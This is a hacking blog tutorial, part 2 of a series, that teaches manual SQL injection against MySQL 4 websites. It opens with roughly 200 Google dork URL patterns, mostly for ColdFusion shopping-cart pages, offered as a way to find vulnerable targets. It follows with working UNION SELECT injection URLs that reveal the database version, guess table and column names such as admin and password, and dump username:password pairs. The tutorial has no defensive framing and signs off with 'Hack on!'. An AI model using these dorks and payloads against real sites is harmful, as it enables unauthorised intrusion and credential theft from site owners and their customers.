This is part 2 out of a series! The next part will go into some tricks for bypassing basic security measures used against SQL injection. This tutorial is completely about MySQL version 4.

Read my previous tutorial:

How to do SQL injection without any tool TUTORIAL PART 1

+———————-+

|What are Google Dorks?|

+———————-+

Before we get into the injected part I would like to elaborate on how to find vulnerable sites. In the last tutorial I mentioned google dorking and how to check if a site is vulnerable.

FYI I will not go over finding the number of columns or using the UNION function in this tutorial. Please check the last one if you do not know what that is because it is crucial. Now… on to dorking.

Google has many hidden tools and commands within its search engine. We can use those to detect patterns in sites. The sites that come upcan be tested by us to find targets.

Below I have provided a “starter pack” or around 200 dorks:

CODE:

about.cfm?cartID=

accinfo.cfm?cartId=

acclogin.cfm?cartID=

add.cfm?bookid=

add_cart.cfm?num=

addcart.cfm?

addItem.cfm

add-to-cart.cfm?ID=

addToCart.cfm?idProduct=

addtomylist.cfm?ProdId=

adminEditProductFields.cfm?intProdID=

advSearch_h.cfm?idCategory=

affiliate.cfm?ID=

affiliate-agreement.cfm?storeid=

affiliates.cfm?id=

ancillary.cfm?ID=

archive.cfm?id=

article.cfm?id=

cfmx?PageID

basket.cfm?id=

Book.cfm?bookID=

book_list.cfm?bookid=

book_view.cfm?bookid=

BookDetails.cfm?ID=

browse.cfm?catid=

browse_item_details.cfm

Browse_Item_Details.cfm?Store_Id=

buy.cfm?

buy.cfm?bookid=

bycategory.cfm?id=

cardinfo.cfm?card=

cart.cfm?action=

cart.cfm?cart_id=

cart.cfm?id=

cart_additem.cfm?id=

cart_validate.cfm?id=

cartadd.cfm?id=

cat.cfm?iCat=

catalog.cfm

catalog.cfm?CatalogID=

catalog_item.cfm?ID=

catalog_main.cfm?catid=

category.cfm

category.cfm?catid=

category_list.cfm?id=

categorydisplay.cfm?catid=

checkout.cfm?cartid=

checkout.cfm?UserID=

checkout_confirmed.cfm?order_id=

checkout1.cfm?cartid=

comersus_listCategoriesAndProducts.cfm?idCategory=

comersus_optEmailToFriendForm.cfm?idProduct=

comersus_optReviewReadExec.cfm?idProduct=

comersus_viewItem.cfm?idProduct=

comments_form.cfm?ID=

contact.cfm?cartId=

content.cfm?id=

customerService.cfm?TextID1=

default.cfm?catID=

description.cfm?bookid=

details.cfm?BookID=

details.cfm?Press_Release_ID=

details.cfm?Product_ID=

details.cfm?Service_ID=

display_item.cfm?id=

displayproducts.cfm

downloadTrial.cfm?intProdID=

emailproduct.cfm?itemid=

emailToFriend.cfm?idProduct=

events.cfm?ID=

faq.cfm?cartID=

faq_list.cfm?id=

faqs.cfm?id=

feedback.cfm?title=

freedownload.cfm?bookid=

fullDisplay.cfm?item=

getbook.cfm?bookid=

GetItems.cfm?itemid=

giftDetail.cfm?id=

help.cfm?CartId=

home.cfm?id=

index.cfm?cart=

index.cfm?cartID=

index.cfm?ID=

info.cfm?ID=

item.cfm?eid=

item.cfm?item_id=

item.cfm?itemid=

item.cfm?model=

item.cfm?prodtype=

item.cfm?shopcd=

item_details.cfm?catid=

item_list.cfm?maingroup

item_show.cfm?code_no=

itemDesc.cfm?CartId=

itemdetail.cfm?item=

itemdetails.cfm?catalogid=

learnmore.cfm?cartID=

links.cfm?catid=

list.cfm?bookid=

List.cfm?CatID=

listcategoriesandproducts.cfm?idCategory=

modline.cfm?id=

myaccount.cfm?catid=

news.cfm?id=

order.cfm?BookID=

order.cfm?id=

order.cfm?item_ID=

OrderForm.cfm?Cart=

page.cfm?PartID=

payment.cfm?CartID=

pdetail.cfm?item_id=

powersearch.cfm?CartId=

price.cfm

privacy.cfm?cartID=

prodbycat.cfm?intCatalogID=

prodetails.cfm?prodid=

prodlist.cfm?catid=

product.cfm?bookID=

product.cfm?intProdID=

product_info.cfm?item_id=

productDetails.cfm?idProduct=

productDisplay.cfm

productinfo.cfm?item=

productlist.cfm?ViewType=Category&CategoryID=

productpage.cfm

products.cfm?ID=

products.cfm?keyword=

products_category.cfm?CategoryID=

products_detail.cfm?CategoryID=

productsByCategory.cfm?intCatalogID=

prodView.cfm?idProduct=

promo.cfm?id=

promotion.cfm?catid=

pview.cfm?Item=

resellers.cfm?idCategory=

results.cfm?cat=

savecart.cfm?CartId=

search.cfm?CartID=

searchcat.cfm?search_id=

Select_Item.cfm?id=

Services.cfm?ID=

shippinginfo.cfm?CartId=

shop.cfm?a=

shop.cfm?action=

shop.cfm?bookid=

shop.cfm?cartID=

shop_details.cfm?prodid=

shopaddtocart.cfm

shopaddtocart.cfm?catalogid=

shopbasket.cfm?bookid=

shopbycategory.cfm?catid=

shopcart.cfm?title=

shopcreatorder.cfm

shopcurrency.cfm?cid=

shopdc.cfm?bookid=

shopdisplaycategories.cfm

shopdisplayproduct.cfm?catalogid=

shopdisplayproducts.cfm

shopexd.cfm

shopexd.cfm?catalogid=

shopping_basket.cfm?cartID=

shopprojectlogin.cfm

shopquery.cfm?catalogid=

shopremoveitem.cfm?cartid=

shopreviewadd.cfm?id=

shopreviewlist.cfm?id=

ShopSearch.cfm?CategoryID=

shoptellafriend.cfm?id=

shopthanks.cfm

shopwelcome.cfm?title=

show_item.cfm?id=

show_item_details.cfm?item_id=

showbook.cfm?bookid=

showStore.cfm?catID=

shprodde.cfm?SKU=

specials.cfm?id=

store.cfm?id=

store_bycat.cfm?id=

store_listing.cfm?id=

Store_ViewProducts.cfm?Cat=

store-details.cfm?id=

storefront.cfm?id=

storefronts.cfm?title=

storeitem.cfm?item=

StoreRedirect.cfm?ID=

subcategories.cfm?id=

tek9.cfm?

template.cfm?Action=Item&pid=

topic.cfm?ID=

tuangou.cfm?bookid=

type.cfm?iType=

updatebasket.cfm?bookid=

updates.cfm?ID=

view.cfm?cid=

view_cart.cfm?title=

view_detail.cfm?ID=

viewcart.cfm?CartId=

viewCart.cfm?userID=

viewCat_h.cfm?idCategory=

viewevent.cfm?EventID=

viewitem.cfm?recor=

viewPrd.cfm?idcategory=

ViewProduct.cfm?misc=

voteList.cfm?item_ID=

whatsnew.cfm?idCategory=

WsAncillary.cfm?ID=

WsPages.cfm?ID=HP

Most of them provide shopping sites but there is a variety in that list.

sql-injection-2

+——————-+

|Injecting in MySQL4|

+——————-+

This is assuming you have used the union function and found vulnerable points. You can put in the @@version variable in one of the injection points to see the version. For example:

http://www.site.com/news.php?id=5 union all select 1,@@version,3

If it prints out 5.x.x use the last tutorial for this part. Otherwise use this one! Most websites use MySQL 5 but knowing both versions is useful!

Throughout this section we are assuming that column 2 out of 3 is injection.

In MySQL 4 there is no information_schema. We must guess the table names. This is easier than you probably think but requires more trial and error. Common table names are admin, users, usernames, etc.

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin

The code above checks if the table admin exists. If we see a 2 on the screen (or whatever injectable number) we know that locating table admin was successful. We can try this until we find a successful table.

Checking for what columns exist in a table is similar. If the injectable data shows up we know it is successful. For example:

http://www.site.com/news.php?id=5 union all select 1,password,3 from admin

To retrieve the data is the same as MySQL 5 once we find the columns and tables:

http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin

+—————–+

|That’s all folks!|

+—————–+

There you go! Injecting MySQL 4! Hope this helped and remember to check out the other tutorial!

How to do SQL injection without any tool TUTORIAL PART 3

How to do SQL injection without any tool TUTORIAL PART 4

Hack on!

2 COMMENTS

LEAVE A REPLY

Please enter your comment!
Please enter your name here